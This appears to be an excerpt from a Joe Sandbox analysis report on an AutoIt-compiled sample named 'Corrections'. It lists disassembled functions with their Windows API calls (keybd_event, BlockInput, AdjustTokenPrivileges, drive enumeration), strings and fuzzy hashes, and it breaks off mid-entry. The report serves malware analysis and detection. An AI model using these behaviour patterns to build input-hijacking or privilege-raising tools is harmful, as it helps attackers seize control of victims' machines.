keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0098BC37

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: b764f8eef66d8245e4f4389d52345391de9e8c6c291773c76f0ebdabf2429331
Instruction ID: 6e1867df99463c121736078624e129f45c3ca6af44a09c3614004cb1d086edb4
Opcode Fuzzy Hash: b764f8eef66d8245e4f4389d52345391de9e8c6c291773c76f0ebdabf2429331
Instruction Fuzzy Hash: 30F0907080424DABDB019FA4C806BFE7FB4FF08319F048419F951A6191D77D8201DF94

Function 00981A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00981B48), ref: 00981A20
CloseHandle.KERNEL32(?,?,00981B48), ref: 00981A35

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a8e43a7d62e1e25369d76b05c96891170fd03592e370dfeaad9a961b9db73d46
Instruction ID: 7d3a59ee86e1116a9c881cbe18cf48572348322244de35370337329accae8f4b
Opcode Fuzzy Hash: a8e43a7d62e1e25369d76b05c96891170fd03592e370dfeaad9a961b9db73d46
Instruction Fuzzy Hash: 28E09A72019610AEE7252B10EC06F7677A9EB48321F14892DB59581471EA726C91EB50

Function 0099F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0099F51A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 46bc885f1be51ab384fa986fc1d597b7f9dc0db74929f01d948058d573a53847
Instruction ID: 67bfa08885b66e3633f94efa88b6bed84536173a355843f0c7383b319a993b3d
Opcode Fuzzy Hash: 46bc885f1be51ab384fa986fc1d597b7f9dc0db74929f01d948058d573a53847
Instruction Fuzzy Hash: 0BE048353102149FC710AF6DE444A5AF7DCAFA4771F018425F849D7351D670F9818B91

Function 0098EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0098ECC7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: dcaa5e8fb8973756b3b96c884dc312779e213e6e47da6b5f7115ee6b57525499
Instruction ID: e0818b1f6ccf2e2912dde09e2cda61f8e4a83ca2ca79e49e4ba2579945a618a0
Opcode Fuzzy Hash: dcaa5e8fb8973756b3b96c884dc312779e213e6e47da6b5f7115ee6b57525499
Instruction Fuzzy Hash: 56D05BBD55810038F41D37384E3FB76150DE781751F448649B282C57D8E5DD9900A221

Function 00940D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0094075E), ref: 00940D4A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 16a1399330244c2c314af531860885a3e2c8a632e67c18cd7431b7f415f88116
Instruction ID: af3dc0ce29b6229124933900461f5844c7c7688f3da28792175e1df9fc69a34d
Opcode Fuzzy Hash: 16a1399330244c2c314af531860885a3e2c8a632e67c18cd7431b7f415f88116
Instruction Fuzzy Hash:

Function 009A353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009A358D
DeleteObject.GDI32(00000000), ref: 009A35A0
DestroyWindow.USER32 ref: 009A35AF
GetDesktopWindow.USER32 ref: 009A35CA
GetWindowRect.USER32(00000000), ref: 009A35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 009A3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 009A370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3755
GetClientRect.USER32(00000000,?), ref: 009A3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009A379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37DD
GlobalLock.KERNEL32(00000000), ref: 009A37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37F5
GlobalUnlock.KERNEL32(00000000), ref: 009A37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3805
GlobalFree.KERNEL32(00000000), ref: 009A3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,009C0C04,00000000), ref: 009A3838
GlobalFree.KERNEL32(00000000), ref: 009A3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 009A386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 009A388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3A9C

Strings

DISPLAY, xrefs: 009A38FF
static, xrefs: 009A3797, 009A38EE
AutoIt v3, xrefs: 009A374F
, xrefs: 009A3A22

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 7c0f7a7dcf530d46fda6dff0580eae5ae01a89494030061b129398d0bccbef4c
Instruction ID: 97c331323173a949be02ef8ff42987dcc9232b28c8ef249e17ab0966e2bae156
Opcode Fuzzy Hash: 7c0f7a7dcf530d46fda6dff0580eae5ae01a89494030061b129398d0bccbef4c
Instruction Fuzzy Hash: 7D028271910215EFDB14DF68CD89EAE7BB9EF49320F148218F915AB2A0DB749D01DFA0

Function 009B7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 009B7B67
GetSysColorBrush.USER32(0000000F), ref: 009B7B98
GetSysColor.USER32(0000000F), ref: 009B7BA4
SetBkColor.GDI32(?,000000FF), ref: 009B7BBE
SelectObject.GDI32(?,?), ref: 009B7BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 009B7BF8
GetSysColor.USER32(00000010), ref: 009B7C00
CreateSolidBrush.GDI32(00000000), ref: 009B7C07
FrameRect.USER32(?,?,00000000), ref: 009B7C16
DeleteObject.GDI32(00000000), ref: 009B7C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 009B7C68
FillRect.USER32(?,?,?), ref: 009B7C9A
GetWindowLongW.USER32(?,000000F0), ref: 009B7CBC

Part of subcall function 009B7E22: GetSysColor.USER32(00000012), ref: 009B7E5B
Part of subcall function 009B7E22: SetTextColor.GDI32(?,009B7B2D), ref: 009B7E5F
Part of subcall function 009B7E22: GetSysColorBrush.USER32(0000000F), ref: 009B7E75
Part of subcall function 009B7E22: GetSysColor.USER32(0000000F), ref: 009B7E80
Part of subcall function 009B7E22: GetSysColor.USER32(00000011), ref: 009B7E9D
Part of subcall function 009B7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009B7EAB
Part of subcall function 009B7E22: SelectObject.GDI32(?,00000000), ref: 009B7EBC
Part of subcall function 009B7E22: SetBkColor.GDI32(?,?), ref: 009B7EC5
Part of subcall function 009B7E22: SelectObject.GDI32(?,?), ref: 009B7ED2
Part of subcall function 009B7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 009B7EF1
Part of subcall function 009B7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009B7F08
Part of subcall function 009B7E22: GetWindowLongW.USER32(?,000000F0), ref: 009B7F15

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: f5f3a2368dcbae3ada24bc5eb96222d80794470a112fa77ebf43f80cf41b2127
Instruction ID: 23c183b65d349da3cde2bd27048f1078f007baaa776c47d0c154e7d2f96fcec0
Opcode Fuzzy Hash: f5f3a2368dcbae3ada24bc5eb96222d80794470a112fa77ebf43f80cf41b2127
Instruction Fuzzy Hash: 1BA18C7101D301AFC7109FA4DE48AAABBA9FF89334F100B19F9A2961E0E775D9449B51

Function 00921625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 009216B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00962B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00962B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00962F85

Part of subcall function 00921802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00921488,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 00921865

SendMessageW.USER32(?,00001053), ref: 00962FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00962FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00962FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00962FF9

Strings

0, xrefs: 00962E11

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 0a060cca9271c699e809e2c9535d2b26b560a95d2c3e09bcce012cd3c85c6974
Instruction ID: 90753beafd5ab6250962fa7316cf06ee7b0f65046cc9424c0240c0258ef8c005
Opcode Fuzzy Hash: 0a060cca9271c699e809e2c9535d2b26b560a95d2c3e09bcce012cd3c85c6974
Instruction Fuzzy Hash: 01120E30209A12EFCB25CF14D984BB9BBE9FF44310F188569F4859B261C776EC92DB91

Function 009A316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009A319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009A32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009A3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009A3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 009A335D
GetClientRect.USER32(00000000,?), ref: 009A3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 009A33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009A33C1
GetStockObject.GDI32(00000011), ref: 009A33D1
SelectObject.GDI32(00000000,00000000), ref: 009A33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 009A33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A33EE
DeleteDC.GDI32(00000000), ref: 009A33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009A3423
SendMessageW.USER32(00000030,00000000,00000001), ref: 009A343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 009A347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009A348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 009A349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 009A34D4
GetStockObject.GDI32(00000011), ref: 009A34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009A34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 009A34F4

Strings

DISPLAY, xrefs: 009A33B7
static, xrefs: 009A33AC, 009A34CE
msctls_progress32, xrefs: 009A3470
AutoIt v3, xrefs: 009A3355

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 41cd9ddd8ee886d553398a0c974c9832a73e7834b8ce9ead0eb31c3c9e6e25ad
Instruction ID: a2b739cdfcf6b1d401e89d0c72db5ef8c1fa528b66b1122922ab4b73c75e0c15
Opcode Fuzzy Hash: 41cd9ddd8ee886d553398a0c974c9832a73e7834b8ce9ead0eb31c3c9e6e25ad
Instruction Fuzzy Hash: ADB17EB1A15215AFEB14DFA8DD49FAE7BA9EF49710F008214F914E7290D7B4AD00DB90

Function 00995524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00995532
GetDriveTypeW.KERNEL32(?,009BDC30,?,\\.\,009BDCD0), ref: 0099560F
SetErrorMode.KERNEL32(00000000,009BDC30,?,\\.\,009BDCD0), ref: 0099577B

Strings

Removable, xrefs: 00995655, 0099565A
ATAPI, xrefs: 009956D6
SSD, xrefs: 0099568F
\\.\, xrefs: 00995584
iSCSI, xrefs: 00995707
Virtual, xrefs: 0099572A
FileBackedVirtual, xrefs: 00995731
RAMDisk, xrefs: 00995639
Fixed, xrefs: 0099564E
SCSI, xrefs: 009956CF
PhysicalDrive, xrefs: 009955BB
Fibre, xrefs: 009956F2
SAS, xrefs: 0099570E
SATA, xrefs: 00995715
CDROM, xrefs: 00995640
MMC, xrefs: 00995723
Unknown, xrefs: 00995632, 009956C8
RAID, xrefs: 00995700
1394, xrefs: 009956E4
Network, xrefs: 00995647
USB, xrefs: 009956F9
ATA, xrefs: 009956DD
SSA, xrefs: 009956EB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 134166eefe5ce302d145af1190834e30e08a2865e24aeb83891b3338213957a1
Instruction ID: a336d71dee65715ea7971ff5da3e08615b31fbeb0899220dc40a30f3839be6e6
Opcode Fuzzy Hash: 134166eefe5ce302d145af1190834e30e08a2865e24aeb83891b3338213957a1
Instruction Fuzzy Hash: DB612630608A45EFCF2BDFACED9197AB3A5EF84314B224415E406AB291C735DF42CB52

Function 009B1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009B1BC4
GetDesktopWindow.USER32 ref: 009B1BD9
GetWindowRect.USER32(00000000), ref: 009B1BE0
GetWindowLongW.USER32(?,000000F0), ref: 009B1C35
DestroyWindow.USER32(?), ref: 009B1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009B1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009B1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 009B1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 009B1CE1
IsWindowVisible.USER32(00000000), ref: 009B1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009B1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009B1D6C
GetWindowRect.USER32(00000000,?), ref: 009B1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 009B1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 009B1DC4
CopyRect.USER32(?,?), ref: 009B1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 009B1E46

Strings

(, xrefs: 009B1DB7
tooltips_class32, xrefs: 009B1C82
0, xrefs: 009B1B6F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 36260af7ee89015114a2c663edcc98ac9a61f4484e15887484565c50116ece34
Instruction ID: a2a26b1855357f8b7f6e2948f42df7da69bea1c5e5738814d5f96a47415b7249
Opcode Fuzzy Hash: 36260af7ee89015114a2c663edcc98ac9a61f4484e15887484565c50116ece34
Instruction Fuzzy Hash: 2AB18E71608311AFD714DF64CA94B9EBBE5FF84320F408A1CF5999B2A1D731E844CB92

Function 009B0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009B0D81
_wcslen.LIBCMT ref: 009B0DBB
_wcslen.LIBCMT ref: 009B0E25
_wcslen.LIBCMT ref: 009B0E8D
_wcslen.LIBCMT ref: 009B0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009B0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009B0FA0

Part of subcall function 0093FD52: _wcslen.LIBCMT ref: 0093FD5D

Part of subcall function 00982B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00982BA5
Part of subcall function 00982B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00982BD7

Strings

SELECTINVERT, xrefs: 009B101A
SELECTCLEAR, xrefs: 009B0FC9
ISSELECTED, xrefs: 009B0F79
DESELECT, xrefs: 009B1038
GETSUBITEMCOUNT, xrefs: 009B0E20, 009B0E3B
SELECT, xrefs: 009B0FE4
GETSELECTED, xrefs: 009B107D
VIEWCHANGE, xrefs: 009B1111
GETTEXT, xrefs: 009B0E88, 009B0EA3
FINDITEM, xrefs: 009B10C3
GETSELECTEDCOUNT, xrefs: 009B0F0C, 009B0F27
SELECTALL, xrefs: 009B0FB1
GETITEMCOUNT, xrefs: 009B0DB2, 009B0DD3

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 57bf6dc4bcca191fbccd2af3b9c27f5bdb2ae9e45b24768802b7b212166eb1c3
Instruction ID: 5b67c99b3868538d01f4891b6f38955240bbdd4c8cca6e2f1399571308da1f0e
Opcode Fuzzy Hash: 57bf6dc4bcca191fbccd2af3b9c27f5bdb2ae9e45b24768802b7b212166eb1c3
Instruction Fuzzy Hash: 26E19E712083418FC714EF28CA519ABB3E6BFD9324B54496CF49A9B3A1DB30ED45CB91

Function 00922521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009225F8
GetSystemMetrics.USER32(00000007), ref: 00922600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0092262B
GetSystemMetrics.USER32(00000008), ref: 00922633
GetSystemMetrics.USER32(00000004), ref: 00922658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00922675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00922685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009226B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009226CC
GetClientRect.USER32(00000000,000000FF), ref: 009226EA
GetStockObject.GDI32(00000011), ref: 00922706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00922711

Part of subcall function 009219CD: GetCursorPos.USER32(?), ref: 009219E1
Part of subcall function 009219CD: ScreenToClient.USER32(00000000,?), ref: 009219FE
Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000001), ref: 00921A23
Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000002), ref: 00921A3D

SetTimer.USER32(00000000,00000000,00000028,0092199C), ref: 00922738

Strings

AutoIt v3 GUI, xrefs: 009226B0

Memory Dump Source

